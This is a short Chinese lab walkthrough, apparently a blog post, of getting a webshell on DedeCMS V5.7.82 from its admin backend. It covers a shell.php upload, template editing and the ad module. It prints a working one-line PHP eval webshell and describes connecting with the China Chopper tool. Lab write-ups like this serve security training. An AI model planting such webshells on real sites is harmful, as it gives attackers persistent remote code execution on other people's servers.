DedeCMS-V5.7.82-UTF8织梦管理系统漏洞

将靶场环境放到www目录下------访问/dedecms/uploads

安装程序 - 织梦内容管理系统 V5.7 UTF8SP2

同意协议------继续

继续

配置后------点击继续

进入后台

登录后台------填写用户名密码。

方法一:上传shell文件

后台------核心------附件管理------上传新文件。

访问/dedecms/uploads/uploads/shell.php

使用菜刀工具连接

进入了目录资源管理器

方法二:模板修改index.html

模板------默认模板管理------修改主页模板

在代码里面插入一句话木马

<?php phpinfo();@eval($_POST'cmd');?>

保存

点击生成------更新主页html------配置一下------点击更新。

浏览------访问/dedecms/uploads/index.php

使用菜刀连接

方法三:广告模块任意命令插入shell

利用广告模块

插入一句话木马

点击代码------修改

使用菜刀连接

相关推荐
hz5678916 分钟前
电子远程评标系统哪家好?安全、合规、易用平台评测指南
安全·云计算·音视频·实时音视频·信息与通信
2301_780303901 小时前
网络安全、自动化运维、ERP、CRM、MES
运维·web安全·网络安全·自动化·安全威胁分析
卓豪终端管理3 小时前
企业数据防泄漏:现代设备控制如何成为终端安全的关键防线
安全
技术不好的崎鸣同学5 小时前
[GXYCTF2019]Ping Ping Ping 思路及解法
网络·安全·web安全
dehuisun5 小时前
等保2.0实施方案
web安全
不会调制解调的猫5 小时前
笔记 | 什么是 rp_filter(反向路径过滤)?
服务器·网络·笔记
treesforest6 小时前
高精度IP定位怎么选?从企业需求出发的选型指南
网络·数据库·tcp/ip·web安全·ip·高精度ip查询
网络小白不怕黑7 小时前
10.邮件服务器搭建并脚本实现监控httpd状态
linux·运维·服务器
doiito(Do It Together)7 小时前
【Web安全,微服务安全】HashiCorp Vault 项目深度分析报告
web安全·微服务·安全架构
CN_HW7 小时前
Nginx 流量镜像配置文档-双轨国产化
服务器·前端·网络